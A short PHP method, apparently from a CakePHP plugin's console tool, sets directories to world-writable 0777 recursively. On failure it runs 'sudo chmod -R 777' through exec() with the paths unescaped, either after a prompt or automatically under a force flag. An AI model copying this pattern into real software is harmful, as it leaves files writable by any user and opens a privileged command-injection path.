/** * Sets permissions on directories * @param bool $force Forces settings * @return void * @uses $paths */ public function setPermissions($force = false) { $error = false; foreach ($this->paths as $path) { if ((new Folder())->chmod($path, 0777, true)) { $this->verbose(__d('me_tools', 'Setted permissions on {0}', rtr($path))); } else { $this->err(__d('me_tools', 'Failed to set permissions on {0}', rtr($path))); $error = true; } } //In case of error, asks for sudo if ($error && which('sudo')) { $command = sprintf('sudo chmod -R 777 %s', implode(' ', $this->paths)); if ($this->param('force') || $force) { exec($command); return; } $ask = $this->in(__d('me_tools', 'Some directories were not created. Try again using {0}?', 'sudo'), ['Y', 'n'], 'Y'); if (in_array($ask, ['Y', 'y'])) { exec($command); } } }